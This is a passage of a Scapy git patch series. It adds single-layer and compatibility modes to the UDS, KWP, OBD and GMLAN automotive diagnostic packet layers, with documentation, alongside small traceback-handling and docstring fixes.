@@@@@@@@@@@@@@@@@\n" + ex.code_run, False def run_test(test, get_interactive_session, theme, verb=3, diff --git a/scapy/utils.py b/scapy/utils.py index 2aea911462d..2ad2fc12426 100644 --- a/scapy/utils.py +++ b/scapy/utils.py @@ -3926,8 +3926,10 @@ def loop(self, debug: int = 0) -> None: for args in calls: try: res = func(self, *args, **kwargs) - except TypeError: + except TypeError as ex: print("Bad number of arguments !") + if debug: + traceback.print_exception(ex) self.help(cmd=cmd) continue except Exception as ex: diff --git a/test/scapy/layers/http.uts b/test/scapy/layers/http.uts index 541200da006..e090bf8b243 100644 --- a/test/scapy/layers/http.uts +++ b/test/scapy/layers/http.uts @@ -309,6 +309,7 @@ class run_httpserver: iface=conf.loopback_name, mech=self.mech, ssp=self.ssp, bg=True, + debug=4, **self.kwargs, ) # wait for it to start From 5cb03bb1eae11659d3085aed372fad2810f2c5d4 Mon Sep 17 00:00:00 2001 From: Gabriel <10530980+gpotter2@users.noreply.github.com> Date: Thu, 23 Apr 2026 18:11:50 +0200 Subject: [PATCH 1630/1632] Minor fixes (#4980) * Fix when last_traceback is None * Missing docstring for ldaphero --- scapy/autorun.py | 13 +++++++++---- scapy/modules/ldaphero.py | 4 ++++ 2 files changed, 13 insertions(+), 4 deletions(-) diff --git a/scapy/autorun.py b/scapy/autorun.py index 1e5d4b10d26..df2794cee5b 100644 --- a/scapy/autorun.py +++ b/scapy/autorun.py @@ -84,10 +84,15 @@ def autorun_commands(_cmds, my_globals=None, verb=None): if interp.runsource(cmd): continue if sys.last_value: # An error occurred - traceback.print_exception(sys.last_type, - sys.last_value, - sys.last_traceback.tb_next, - file=sys.stdout) + traceback.print_exception( + sys.last_type, + sys.last_value, + ( + sys.last_traceback.tb_next + if sys.last_traceback is not None else None + ), + file=sys.stdout, + ) sys.last_value = None return False cmd = "" diff --git a/scapy/modules/ldaphero.py b/scapy/modules/ldaphero.py index ac739b4a5b1..cd4bd4fb658 100644 --- a/scapy/modules/ldaphero.py +++ b/scapy/modules/ldaphero.py @@ -144,6 +144,10 @@ class LDAPHero: :param HashNt: if provided, used for auth (NTLM) :param HashAes256Sha96: if provided, used for auth (Kerberos) :param HashAes128Sha96: if provided, used for auth (Kerberos) + :param use_krb5ccname: (bool) if true, the KRB5CCNAME environment variable will + be used if available. + :param use_winssp: (bool) (only works on Windows). Use implicit authentication + through WinSSP. """ def __init__( From 353018b705b043d3ddcbf3db096974e3c6d46c01 Mon Sep 17 00:00:00 2001 From: Gabriel <10530980+gpotter2@users.noreply.github.com> Date: Thu, 23 Apr 2026 18:24:07 +0200 Subject: [PATCH 1631/1632] Revert last commit... (#4981) --- scapy/autorun.py | 5 +---- 1 file changed, 1 insertion(+), 4 deletions(-) diff --git a/scapy/autorun.py b/scapy/autorun.py index df2794cee5b..a0ee9e7469e 100644 --- a/scapy/autorun.py +++ b/scapy/autorun.py @@ -87,10 +87,7 @@ def autorun_commands(_cmds, my_globals=None, verb=None): traceback.print_exception( sys.last_type, sys.last_value, - ( - sys.last_traceback.tb_next - if sys.last_traceback is not None else None - ), + sys.last_traceback.tb_next, file=sys.stdout, ) sys.last_value = None From 1745d390da0bee6e7c83270723f729c441999d00 Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Fri, 24 Apr 2026 07:49:33 +0200 Subject: [PATCH 1632/1632] Introduce single-layer and compatibility modes for UDS, KWP, OBD, and GMLAN protocols; add documentation and tests. (#4962) Co-authored-by: Nils Weiss --- doc/scapy/layers/automotive.rst | 92 ++++++++ scapy/contrib/automotive/gm/gmlan.py | 130 +++++++++-- scapy/contrib/automotive/kwp.py | 198 ++++++++++++++-- scapy/contrib/automotive/obd/iid/iids.py | 10 +- scapy/contrib/automotive/obd/mid/mids.py | 10 +- scapy/contrib/automotive/obd/obd.py | 83 +++++-- scapy/contrib/automotive/obd/pid/pids.py | 8 +- .../contrib/automotive/obd/pid/pids_00_1F.py | 6 +- scapy/contrib/automotive/obd/services.py | 83 ++++++- scapy/contrib/automotive/obd/tid/tids.py | 8 +- scapy/contrib/automotive/uds.py | 213 +++++++++++++++--- test/contrib/automotive/gm/gmlan.uts | 126 ++++++++++- test/contrib/automotive/kwp.uts | 141 ++++++++++++ test/contrib/automotive/obd/obd.uts | 124 ++++++++++ test/contrib/automotive/uds.uts | 176 +++++++++++++++ 15 files changed, 1302 insertions(+), 106 deletions(-) diff --git a/doc/scapy/layers/automotive.rst b/doc/scapy/layers/automotive.rst index 6abee5daa66..a9fa9d3e107 100644 --- a/doc/scapy/layers/automotive.rst +++ b/doc/scapy/layers/automotive.rst @@ -1081,6 +1081,98 @@ to the Scapy interpreter:: .. image:: ../graphics/animations/animation-scapy-uds3.svg + +Single Layer Mode +----------------- + +UDS, KWP, OBD, and GMLAN all support a *single layer mode* that makes each +service packet a standalone ``Packet`` rather than a nested sublayer. + +**Default (multi-layer) mode** + +.. code-block:: python + + >>> pkt = UDS() / UDS_DSC(diagnosticSessionType=0x01) + >>> UDS(b'\x10\x01') + > + +**Single layer mode** + +To enable before loading a module:: + + >>> conf.contribs['UDS'] = {'treat-response-pending-as-answer': False, + ... 'single_layer_mode': True} + >>> load_contrib('automotive.uds') + +To toggle at runtime after loading:: + + >>> conf.contribs['UDS']['single_layer_mode'] = True + >>> UDS(b'\x10\x01') + + >>> bytes(UDS_DSC(diagnosticSessionType=0x01)) + b'\x10\x01' + >>> conf.contribs['UDS']['single_layer_mode'] = False # revert to multi-layer mode + +The same ``single_layer_mode`` key works for all protocols: replace ``'UDS'`` +with ``'KWP'``, ``'OBD'``, or ``'GMLAN'`` as appropriate. + +Compatibility Mode +------------------ + +Scapy allows crafting packets freely, including stacking a service sub-packet +on top of the base protocol layer (e.g. ``UDS()/UDS_DSC()``). When both +``single_layer_mode`` *and* stacking are used together, the ``service`` byte +would normally appear twice in the resulting byte stream – once from the base +layer and once from the sub-packet's own ``service`` ConditionalField. + +The **compatibility mode** flag (``compatibility_mode``, default ``True``) +addresses this: when it is enabled and ``single_layer_mode`` is active, the +sub-packet's ``service`` field is automatically **suppressed** whenever the +immediate underlayer is already the matching base-protocol packet. + +.. list-table:: Behaviour matrix + :header-rows: 1 + :widths: 25 25 50 + + * - ``single_layer_mode`` + - ``compatibility_mode`` + - ``UDS()/UDS_DSC()`` byte layout + * - ``False`` + - any + - ``service`` (UDS) + ``diagnosticSessionType`` (UDS_DSC) + * - ``True`` + - ``True`` *(default)* + - ``service`` (UDS) + ``diagnosticSessionType`` (UDS_DSC) — duplicate suppressed + * - ``True`` + - ``False`` + - ``service`` (UDS) + ``service`` (UDS_DSC) + ``diagnosticSessionType`` (UDS_DSC) + +Example with compatibility mode on (default):: + + >>> conf.contribs['UDS']['single_layer_mode'] = True + >>> conf.contribs['UDS']['compatibility_mode'] = True # already the default + + >>> # Standalone sub-packet: service field IS present (no UDS underlayer) + >>> bytes(UDS_DSC(diagnosticSessionType=0x01)) + b'\x10\x01' + + >>> # Stacked: service field in UDS_DSC is suppressed (UDS is the underlayer) + >>> bytes(UDS() / UDS_DSC(diagnosticSessionType=0x01)) + b'\x10\x01' + +Example with compatibility mode off:: + + >>> conf.contribs['UDS']['compatibility_mode'] = False + + >>> # Stacked: both UDS and UDS_DSC emit a service byte + >>> bytes(UDS() / UDS_DSC(diagnosticSessionType=0x01)) + b'\x10\x10\x01' + + >>> conf.contribs['UDS']['compatibility_mode'] = True # restore default + +The same ``compatibility_mode`` key works for all protocols: replace ``'UDS'`` +with ``'KWP'``, ``'OBD'``, or ``'GMLAN'`` as appropriate. + GMLAN ===== diff --git a/scapy/contrib/automotive/gm/gmlan.py b/scapy/contrib/automotive/gm/gmlan.py index 76c9cf110f1..62c88b208d7 100644 --- a/scapy/contrib/automotive/gm/gmlan.py +++ b/scapy/contrib/automotive/gm/gmlan.py @@ -32,6 +32,12 @@ from scapy.packet import Packet, bind_layers, NoPayload from scapy.config import conf from scapy.contrib.isotp import ISOTP +from scapy.compat import orb + +from typing import ( # noqa: F401 + Dict, + Type, +) """ GMLAN @@ -46,11 +52,38 @@ # "a negative response 'RequestCorrectlyReceived-" # "ResponsePending' as answer of a request. \n" # "The default value is False.") - conf.contribs['GMLAN'] = {'treat-response-pending-as-answer': False} + conf.contribs['GMLAN'] = {'treat-response-pending-as-answer': False, + 'single_layer_mode': False, + 'compatibility_mode': True} conf.contribs['GMLAN']['GMLAN_ECU_AddressingScheme'] = None +def _gmlan_slm(pkt): + # type: (Packet) -> bool + """Return True when the service ConditionalField should be present. + + Two configuration keys in ``conf.contribs['GMLAN']`` control the behaviour: + + ``single_layer_mode`` (bool, default ``False``): + When *True*, :class:`GMLAN` acts as a dispatch layer and returns the + matching service sub-packet directly. Each sub-packet gains its own + ``service`` field so that it can be built and dissected stand-alone. + + ``compatibility_mode`` (bool, default ``True``): + Only relevant when ``single_layer_mode`` is *True*. When *True* the + ``service`` field is **suppressed** in a sub-packet whose immediate + underlayer is already a :class:`GMLAN` packet, preventing a duplicate + service byte when sub-packets are stacked (``GMLAN()/GMLAN_IDO()``). + Set to *False* to always emit the ``service`` byte from the sub-packet. + """ + if not conf.contribs['GMLAN'].get('single_layer_mode', False): + return False + if conf.contribs['GMLAN'].get('compatibility_mode', True): + return pkt.underlayer is None or not isinstance(pkt.underlayer, GMLAN) + return True + + class GMLAN(ISOTP): @staticmethod def determine_len(x): @@ -130,6 +163,17 @@ def hashret(self): return struct.pack('B', self.requestServiceId & ~0x40) return struct.pack('B', self.service & ~0x40) + _service_cls = {} # type: Dict[int, Type[Packet]] + + @classmethod + def dispatch_hook(cls, _pkt=b"", *args, **kwargs): + # type: (...) -> type + """Dispatch to the correct GMLAN service class in single layer mode.""" + if conf.contribs['GMLAN'].get('single_layer_mode', False) and len(_pkt) >= 1: + service = orb(_pkt[0]) + return cls._service_cls.get(service, cls) + return cls + # ########################IDO################################### class GMLAN_IDO(Packet): @@ -139,11 +183,13 @@ class GMLAN_IDO(Packet): 0x04: 'wakeUpLinks'} name = 'InitiateDiagnosticOperation' fields_desc = [ + ConditionalField(XByteEnumField('service', 0x10, GMLAN.services), _gmlan_slm), ByteEnumField('subfunction', 0, subfunctions) ] bind_layers(GMLAN, GMLAN_IDO, service=0x10) +GMLAN._service_cls[0x10] = GMLAN_IDO # ########################RFRD################################### @@ -166,18 +212,21 @@ class GMLAN_RFRD(Packet): 0x02: 'readFailureRecordParameters'} name = 'ReadFailureRecordData' fields_desc = [ + ConditionalField(XByteEnumField('service', 0x12, GMLAN.services), _gmlan_slm), ByteEnumField('subfunction', 0, subfunctions), - ConditionalField(PacketField("dtc", b'', GMLAN_DTC), + ConditionalField(PacketField("dtc", None, GMLAN_DTC), lambda pkt: pkt.subfunction == 0x02) ] bind_layers(GMLAN, GMLAN_RFRD, service=0x12) +GMLAN._service_cls[0x12] = GMLAN_RFRD class GMLAN_RFRDPR(Packet): name = 'ReadFailureRecordDataPositiveResponse' fields_desc = [ + ConditionalField(XByteEnumField('service', 0x52, GMLAN.services), _gmlan_slm), ByteEnumField('subfunction', 0, GMLAN_RFRD.subfunctions) ] @@ -187,6 +236,7 @@ def answers(self, other): bind_layers(GMLAN, GMLAN_RFRDPR, service=0x52) +GMLAN._service_cls[0x52] = GMLAN_RFRDPR class GMLAN_RFRDPR_RFRI(Packet): @@ -208,7 +258,7 @@ class GMLAN_RFRDPR_RFRI(Packet): class GMLAN_RFRDPR_RFRP(Packet): name = 'ReadFailureRecordDataPositiveResponse_readFailureRecordParameters' fields_desc = [ - PacketField("dtc", b'', GMLAN_DTC) + PacketField("dtc", None, GMLAN_DTC) ] @@ -304,16 +354,19 @@ class GMLAN_RDBI(Packet): name = 'ReadDataByIdentifier' fields_desc = [ + ConditionalField(XByteEnumField('service', 0x1a, GMLAN.services), _gmlan_slm), XByteEnumField('dataIdentifier', 0, dataIdentifiers) ] -bind_layers(GMLAN, GMLAN_RDBI, service=0x1A) +bind_layers(GMLAN, GMLAN_RDBI, service=0x1a) +GMLAN._service_cls[0x1a] = GMLAN_RDBI class GMLAN_RDBIPR(Packet): name = 'ReadDataByIdentifierPositiveResponse' fields_desc = [ + ConditionalField(XByteEnumField('service', 0x5a, GMLAN.services), _gmlan_slm), XByteEnumField('dataIdentifier', 0, GMLAN_RDBI.dataIdentifiers), ] @@ -322,7 +375,8 @@ def answers(self, other): other.dataIdentifier == self.dataIdentifier -bind_layers(GMLAN, GMLAN_RDBIPR, service=0x5A) +bind_layers(GMLAN, GMLAN_RDBIPR, service=0x5a) +GMLAN._service_cls[0x5a] = GMLAN_RDBIPR # ########################RDBI################################### @@ -334,6 +388,7 @@ class GMLAN_RDBPI(Packet): }) name = 'ReadDataByParameterIdentifier' fields_desc = [ + ConditionalField(XByteEnumField('service', 0x22, GMLAN.services), _gmlan_slm), FieldListField("identifiers", [], XShortEnumField('parameterIdentifier', 0, dataIdentifiers)) @@ -341,11 +396,13 @@ class GMLAN_RDBPI(Packet): bind_layers(GMLAN, GMLAN_RDBPI, service=0x22) +GMLAN._service_cls[0x22] = GMLAN_RDBPI class GMLAN_RDBPIPR(Packet): name = 'ReadDataByParameterIdentifierPositiveResponse' fields_desc = [ + ConditionalField(XByteEnumField('service', 0x62, GMLAN.services), _gmlan_slm), XShortEnumField('parameterIdentifier', 0, GMLAN_RDBPI.dataIdentifiers), ] @@ -355,6 +412,7 @@ def answers(self, other): bind_layers(GMLAN, GMLAN_RDBPIPR, service=0x62) +GMLAN._service_cls[0x62] = GMLAN_RDBPIPR # ########################RDBPKTI################################### @@ -369,6 +427,7 @@ class GMLAN_RDBPKTI(Packet): } fields_desc = [ + ConditionalField(XByteEnumField('service', 0xaa, GMLAN.services), _gmlan_slm), XByteEnumField('subfunction', 0, subfunctions), ConditionalField(FieldListField('request_DPIDs', [], XByteField("", 0)), @@ -376,13 +435,15 @@ class GMLAN_RDBPKTI(Packet): ] -bind_layers(GMLAN, GMLAN_RDBPKTI, service=0xAA) +bind_layers(GMLAN, GMLAN_RDBPKTI, service=0xaa) +GMLAN._service_cls[0xaa] = GMLAN_RDBPKTI # ########################RMBA################################### class GMLAN_RMBA(Packet): name = 'ReadMemoryByAddress' fields_desc = [ + ConditionalField(XByteEnumField('service', 0x23, GMLAN.services), _gmlan_slm), MultipleTypeField( [ (XShortField('memoryAddress', 0), @@ -398,11 +459,13 @@ class GMLAN_RMBA(Packet): bind_layers(GMLAN, GMLAN_RMBA, service=0x23) +GMLAN._service_cls[0x23] = GMLAN_RMBA class GMLAN_RMBAPR(Packet): name = 'ReadMemoryByAddressPositiveResponse' fields_desc = [ + ConditionalField(XByteEnumField('service', 0x63, GMLAN.services), _gmlan_slm), MultipleTypeField( [ (XShortField('memoryAddress', 0), @@ -422,6 +485,7 @@ def answers(self, other): bind_layers(GMLAN, GMLAN_RMBAPR, service=0x63) +GMLAN._service_cls[0x63] = GMLAN_RMBAPR # ########################SA################################### @@ -443,6 +507,7 @@ class GMLAN_SA(Packet): name = 'SecurityAccess' fields_desc = [ + ConditionalField(XByteEnumField('service', 0x27, GMLAN.services), _gmlan_slm), ByteEnumField('subfunction', 0, subfunctions), ConditionalField(XShortField('securityKey', 0), lambda pkt: pkt.subfunction % 2 == 0) @@ -450,11 +515,13 @@ class GMLAN_SA(Packet): bind_layers(GMLAN, GMLAN_SA, service=0x27) +GMLAN._service_cls[0x27] = GMLAN_SA class GMLAN_SAPR(Packet): name = 'SecurityAccessPositiveResponse' fields_desc = [ + ConditionalField(XByteEnumField('service', 0x67, GMLAN.services), _gmlan_slm), ByteEnumField('subfunction', 0, GMLAN_SA.subfunctions), ConditionalField(XShortField('securitySeed', 0), lambda pkt: pkt.subfunction % 2 == 1), @@ -466,23 +533,27 @@ def answers(self, other): bind_layers(GMLAN, GMLAN_SAPR, service=0x67) +GMLAN._service_cls[0x67] = GMLAN_SAPR # ########################DDM################################### class GMLAN_DDM(Packet): name = 'DynamicallyDefineMessage' fields_desc = [ + ConditionalField(XByteEnumField('service', 0x2c, GMLAN.services), _gmlan_slm), XByteField('DPIDIdentifier', 0), StrField('PIDData', b'\x00\x00') ] -bind_layers(GMLAN, GMLAN_DDM, service=0x2C) +bind_layers(GMLAN, GMLAN_DDM, service=0x2c) +GMLAN._service_cls[0x2c] = GMLAN_DDM class GMLAN_DDMPR(Packet): name = 'DynamicallyDefineMessagePositiveResponse' fields_desc = [ + ConditionalField(XByteEnumField('service', 0x6c, GMLAN.services), _gmlan_slm), XByteField('DPIDIdentifier', 0) ] @@ -491,13 +562,15 @@ def answers(self, other): and other.DPIDIdentifier == self.DPIDIdentifier -bind_layers(GMLAN, GMLAN_DDMPR, service=0x6C) +bind_layers(GMLAN, GMLAN_DDMPR, service=0x6c) +GMLAN._service_cls[0x6c] = GMLAN_DDMPR # ########################DPBA################################### class GMLAN_DPBA(Packet): name = 'DefinePIDByAddress' fields_desc = [ + ConditionalField(XByteEnumField('service', 0x2d, GMLAN.services), _gmlan_slm), XShortField('parameterIdentifier', 0), MultipleTypeField( [ @@ -513,12 +586,14 @@ class GMLAN_DPBA(Packet): ] -bind_layers(GMLAN, GMLAN_DPBA, service=0x2D) +bind_layers(GMLAN, GMLAN_DPBA, service=0x2d) +GMLAN._service_cls[0x2d] = GMLAN_DPBA class GMLAN_DPBAPR(Packet): name = 'DefinePIDByAddressPositiveResponse' fields_desc = [ + ConditionalField(XByteEnumField('service', 0x6d, GMLAN.services), _gmlan_slm), XShortField('parameterIdentifier', 0), ] @@ -527,13 +602,15 @@ def answers(self, other): and other.parameterIdentifier == self.parameterIdentifier -bind_layers(GMLAN, GMLAN_DPBAPR, service=0x6D) +bind_layers(GMLAN, GMLAN_DPBAPR, service=0x6d) +GMLAN._service_cls[0x6d] = GMLAN_DPBAPR # ########################RD################################### class GMLAN_RD(Packet): name = 'RequestDownload' fields_desc = [ + ConditionalField(XByteEnumField('service', 0x34, GMLAN.services), _gmlan_slm), XByteField('dataFormatIdentifier', 0), MultipleTypeField( [ @@ -549,6 +626,7 @@ class GMLAN_RD(Packet): bind_layers(GMLAN, GMLAN_RD, service=0x34) +GMLAN._service_cls[0x34] = GMLAN_RD # ########################TD################################### @@ -559,6 +637,7 @@ class GMLAN_TD(Packet): } name = 'TransferData' fields_desc = [ + ConditionalField(XByteEnumField('service', 0x36, GMLAN.services), _gmlan_slm), ByteEnumField('subfunction', 0, subfunctions), MultipleTypeField( [ @@ -575,23 +654,27 @@ class GMLAN_TD(Packet): bind_layers(GMLAN, GMLAN_TD, service=0x36) +GMLAN._service_cls[0x36] = GMLAN_TD # ########################WDBI################################### class GMLAN_WDBI(Packet): name = 'WriteDataByIdentifier' fields_desc = [ + ConditionalField(XByteEnumField('service', 0x3b, GMLAN.services), _gmlan_slm), XByteEnumField('dataIdentifier', 0, GMLAN_RDBI.dataIdentifiers), StrField("dataRecord", b'') ] -bind_layers(GMLAN, GMLAN_WDBI, service=0x3B) +bind_layers(GMLAN, GMLAN_WDBI, service=0x3b) +GMLAN._service_cls[0x3b] = GMLAN_WDBI class GMLAN_WDBIPR(Packet): name = 'WriteDataByIdentifierPositiveResponse' fields_desc = [ + ConditionalField(XByteEnumField('service', 0x7b, GMLAN.services), _gmlan_slm), XByteEnumField('dataIdentifier', 0, GMLAN_RDBI.dataIdentifiers) ] @@ -600,7 +683,8 @@ def answers(self, other): and other.dataIdentifier == self.dataIdentifier -bind_layers(GMLAN, GMLAN_WDBIPR, service=0x7B) +bind_layers(GMLAN, GMLAN_WDBIPR, service=0x7b) +GMLAN._service_cls[0x7b] = GMLAN_WDBIPR # ########################RPSPR################################### @@ -619,11 +703,13 @@ class GMLAN_RPSPR(Packet): } name = 'ReportProgrammedStatePositiveResponse' fields_desc = [ + ConditionalField(XByteEnumField('service', 0xe2, GMLAN.services), _gmlan_slm), ByteEnumField('programmedState', 0, programmedStates), ] -bind_layers(GMLAN, GMLAN_RPSPR, service=0xE2) +bind_layers(GMLAN, GMLAN_RPSPR, service=0xe2) +GMLAN._service_cls[0xe2] = GMLAN_RPSPR # ########################PM################################### @@ -635,11 +721,13 @@ class GMLAN_PM(Packet): } name = 'ProgrammingMode' fields_desc = [ + ConditionalField(XByteEnumField('service', 0xa5, GMLAN.services), _gmlan_slm), ByteEnumField('subfunction', 0, subfunctions), ] -bind_layers(GMLAN, GMLAN_PM, service=0xA5) +bind_layers(GMLAN, GMLAN_PM, service=0xa5) +GMLAN._service_cls[0xa5] = GMLAN_PM # ########################RDI################################### @@ -651,11 +739,13 @@ class GMLAN_RDI(Packet): } name = 'ReadDiagnosticInformation' fields_desc = [ + ConditionalField(XByteEnumField('service', 0xa9, GMLAN.services), _gmlan_slm), ByteEnumField('subfunction', 0, subfunctions) ] -bind_layers(GMLAN, GMLAN_RDI, service=0xA9) +bind_layers(GMLAN, GMLAN_RDI, service=0xa9) +GMLAN._service_cls[0xa9] = GMLAN_RDI class GMLAN_RDI_BN(Packet): @@ -697,17 +787,20 @@ class GMLAN_RDI_BC(Packet): class GMLAN_DC(Packet): name = 'DeviceControl' fields_desc = [ + ConditionalField(XByteEnumField('service', 0xae, GMLAN.services), _gmlan_slm), XByteField('CPIDNumber', 0), StrFixedLenField('CPIDControlBytes', b"", 5) ] -bind_layers(GMLAN, GMLAN_DC, service=0xAE) +bind_layers(GMLAN, GMLAN_DC, service=0xae) +GMLAN._service_cls[0xae] = GMLAN_DC class GMLAN_DCPR(Packet): name = 'DeviceControlPositiveResponse' fields_desc = [ + ConditionalField(XByteEnumField('service', 0xee, GMLAN.services), _gmlan_slm), XByteField('CPIDNumber', 0) ] @@ -716,7 +809,8 @@ def answers(self, other): and other.CPIDNumber == self.CPIDNumber -bind_layers(GMLAN, GMLAN_DCPR, service=0xEE) +bind_layers(GMLAN, GMLAN_DCPR, service=0xee) +GMLAN._service_cls[0xee] = GMLAN_DCPR # ########################NRC################################### @@ -739,6 +833,7 @@ class GMLAN_NR(Packet): } name = 'NegativeResponse' fields_desc = [ + ConditionalField(XByteEnumField('service', 0x7f, GMLAN.services), _gmlan_slm), XByteEnumField('requestServiceId', 0, GMLAN.services), MayEnd(ByteEnumField('returnCode', 0, negativeResponseCodes)), # XXX Is this MayEnd correct? Why is the field below also 0xe3 ? @@ -752,3 +847,4 @@ def answers(self, other): bind_layers(GMLAN, GMLAN_NR, service=0x7f) +GMLAN._service_cls[0x7f] = GMLAN_NR diff --git a/scapy/contrib/automotive/kwp.py b/scapy/contrib/automotive/kwp.py index 5617c1d7a23..019319ee10f 100644 --- a/scapy/contrib/automotive/kwp.py +++ b/scapy/contrib/automotive/kwp.py @@ -21,16 +21,18 @@ XByteField, XShortEnumField, ) -from scapy.packet import Packet, bind_layers, NoPayload +from scapy.packet import Packet, NoPayload, bind_layers from scapy.config import conf from scapy.error import log_loading from scapy.utils import PeriodicSenderThread -from scapy.plist import _PacketIterable +from scapy.plist import _PacketIterable # noqa: F401 from scapy.contrib.isotp import ISOTP +from scapy.compat import orb -from typing import ( - Dict, +from typing import ( # noqa: F401 Any, + Dict, + Type, ) @@ -43,7 +45,34 @@ "a negative response 'requestCorrectlyReceived-" "ResponsePending' as answer of a request. \n" "The default value is False.") - conf.contribs['KWP'] = {'treat-response-pending-as-answer': False} + conf.contribs['KWP'] = {'treat-response-pending-as-answer': False, + 'single_layer_mode': False, + 'compatibility_mode': True} + + +def _kwp_slm(pkt): + # type: (Packet) -> bool + """Return True when the service ConditionalField should be present. + + Two configuration keys in ``conf.contribs['KWP']`` control the behaviour: + + ``single_layer_mode`` (bool, default ``False``): + When *True*, :class:`KWP` acts as a dispatch layer and returns the + matching service sub-packet directly. Each sub-packet gains its own + ``service`` field so that it can be built and dissected stand-alone. + + ``compatibility_mode`` (bool, default ``True``): + Only relevant when ``single_layer_mode`` is *True*. When *True* the + ``service`` field is **suppressed** in a sub-packet whose immediate + underlayer is already a :class:`KWP` packet, preventing a duplicate + service byte when sub-packets are stacked (``KWP()/KWP_SDS()``). + Set to *False* to always emit the ``service`` byte from the sub-packet. + """ + if not conf.contribs['KWP'].get('single_layer_mode', False): + return False + if conf.contribs['KWP'].get('compatibility_mode', True): + return pkt.underlayer is None or not isinstance(pkt.underlayer, KWP) + return True class KWP(ISOTP): @@ -113,13 +142,13 @@ def answers(self, other): if not isinstance(other, type(self)): return False if self.service == 0x7f: - return self.payload.answers(other) + return bool(self.payload.answers(other)) if self.service == (other.service + 0x40): if isinstance(self.payload, NoPayload) or \ isinstance(other.payload, NoPayload): return len(self) <= len(other) else: - return self.payload.answers(other.payload) + return bool(self.payload.answers(other.payload)) return False def hashret(self): @@ -129,6 +158,17 @@ def hashret(self): else: return struct.pack('B', self.service & ~0x40) + _service_cls = {} # type: Dict[int, Type[Packet]] + + @classmethod + def dispatch_hook(cls, _pkt=b"", *args, **kwargs): + # type: (bytes, Any, Any) -> type + """Dispatch to the correct KWP service class in single layer mode.""" + if conf.contribs['KWP'].get('single_layer_mode', False) and len(_pkt) >= 1: + service = orb(_pkt[0]) + return cls._service_cls.get(service, cls) + return cls + # ########################SDS################################### class KWP_SDS(Packet): @@ -140,16 +180,19 @@ class KWP_SDS(Packet): 0x92: 'extendedDiagnosticSession'}) name = 'StartDiagnosticSession' fields_desc = [ + ConditionalField(XByteEnumField('service', 0x10, KWP.services), _kwp_slm), ByteEnumField('diagnosticSession', 0, diagnosticSessionTypes) ] bind_layers(KWP, KWP_SDS, service=0x10) +KWP._service_cls[0x10] = KWP_SDS class KWP_SDSPR(Packet): name = 'StartDiagnosticSessionPositiveResponse' fields_desc = [ + ConditionalField(XByteEnumField('service', 0x50, KWP.services), _kwp_slm), ByteEnumField('diagnosticSession', 0, KWP_SDS.diagnosticSessionTypes), ] @@ -161,6 +204,7 @@ def answers(self, other): bind_layers(KWP, KWP_SDSPR, service=0x50) +KWP._service_cls[0x50] = KWP_SDSPR # ######################### KWP_ER ################################### @@ -171,14 +215,19 @@ class KWP_ER(Packet): 0x82: 'nonvolatileMemoryReset'} name = 'ECUReset' fields_desc = [ + ConditionalField(XByteEnumField('service', 0x11, KWP.services), _kwp_slm), ByteEnumField('resetMode', 0, resetModes) ] bind_layers(KWP, KWP_ER, service=0x11) +KWP._service_cls[0x11] = KWP_ER class KWP_ERPR(Packet): + fields_desc = [ + ConditionalField(XByteEnumField('service', 0x51, KWP.services), _kwp_slm), + ] name = 'ECUResetPositiveResponse' def answers(self, other): @@ -187,12 +236,14 @@ def answers(self, other): bind_layers(KWP, KWP_ERPR, service=0x51) +KWP._service_cls[0x51] = KWP_ERPR # ######################### KWP_SA ################################### class KWP_SA(Packet): name = 'SecurityAccess' fields_desc = [ + ConditionalField(XByteEnumField('service', 0x27, KWP.services), _kwp_slm), ByteField('accessMode', 0), ConditionalField(StrField('key', b""), lambda pkt: pkt.accessMode % 2 == 0) @@ -200,11 +251,13 @@ class KWP_SA(Packet): bind_layers(KWP, KWP_SA, service=0x27) +KWP._service_cls[0x27] = KWP_SA class KWP_SAPR(Packet): name = 'SecurityAccessPositiveResponse' fields_desc = [ + ConditionalField(XByteEnumField('service', 0x67, KWP.services), _kwp_slm), ByteField('accessMode', 0), ConditionalField(StrField('seed', b""), lambda pkt: pkt.accessMode % 2 == 1), @@ -217,6 +270,7 @@ def answers(self, other): bind_layers(KWP, KWP_SAPR, service=0x67) +KWP._service_cls[0x67] = KWP_SAPR # ######################### KWP_IOCBLI ################################### @@ -231,6 +285,7 @@ class KWP_IOCBLI(Packet): 0x08: "Long Term Adjustment" } fields_desc = [ + ConditionalField(XByteEnumField('service', 0x30, KWP.services), _kwp_slm), XByteField('localIdentifier', 0), XByteEnumField('inputOutputControlParameter', 0, inputOutputControlParameters), @@ -239,11 +294,13 @@ class KWP_IOCBLI(Packet): bind_layers(KWP, KWP_IOCBLI, service=0x30) +KWP._service_cls[0x30] = KWP_IOCBLI class KWP_IOCBLIPR(Packet): name = 'InputOutputControlByLocalIdentifierPositiveResponse' fields_desc = [ + ConditionalField(XByteEnumField('service', 0x70, KWP.services), _kwp_slm), XByteField('localIdentifier', 0), XByteEnumField('inputOutputControlParameter', 0, KWP_IOCBLI.inputOutputControlParameters), @@ -257,6 +314,7 @@ def answers(self, other): bind_layers(KWP, KWP_IOCBLIPR, service=0x70) +KWP._service_cls[0x70] = KWP_IOCBLIPR # ######################### KWP_DNMT ################################### @@ -267,14 +325,19 @@ class KWP_DNMT(Packet): } name = 'DisableNormalMessageTransmission' fields_desc = [ + ConditionalField(XByteEnumField('service', 0x28, KWP.services), _kwp_slm), ByteEnumField('responseRequired', 0, responseTypes) ] bind_layers(KWP, KWP_DNMT, service=0x28) +KWP._service_cls[0x28] = KWP_DNMT class KWP_DNMTPR(Packet): + fields_desc = [ + ConditionalField(XByteEnumField('service', 0x68, KWP.services), _kwp_slm), + ] name = 'DisableNormalMessageTransmissionPositiveResponse' def answers(self, other): @@ -283,6 +346,7 @@ def answers(self, other): bind_layers(KWP, KWP_DNMTPR, service=0x68) +KWP._service_cls[0x68] = KWP_DNMTPR # ######################### KWP_ENMT ################################### @@ -293,14 +357,19 @@ class KWP_ENMT(Packet): } name = 'EnableNormalMessageTransmission' fields_desc = [ + ConditionalField(XByteEnumField('service', 0x29, KWP.services), _kwp_slm), ByteEnumField('responseRequired', 1, responseTypes) ] bind_layers(KWP, KWP_ENMT, service=0x29) +KWP._service_cls[0x29] = KWP_ENMT class KWP_ENMTPR(Packet): + fields_desc = [ + ConditionalField(XByteEnumField('service', 0x69, KWP.services), _kwp_slm), + ] name = 'EnableNormalMessageTransmissionPositiveResponse' def answers(self, other): @@ -309,6 +378,7 @@ def answers(self, other): bind_layers(KWP, KWP_ENMTPR, service=0x69) +KWP._service_cls[0x69] = KWP_ENMTPR # ######################### KWP_TP ################################### @@ -319,14 +389,19 @@ class 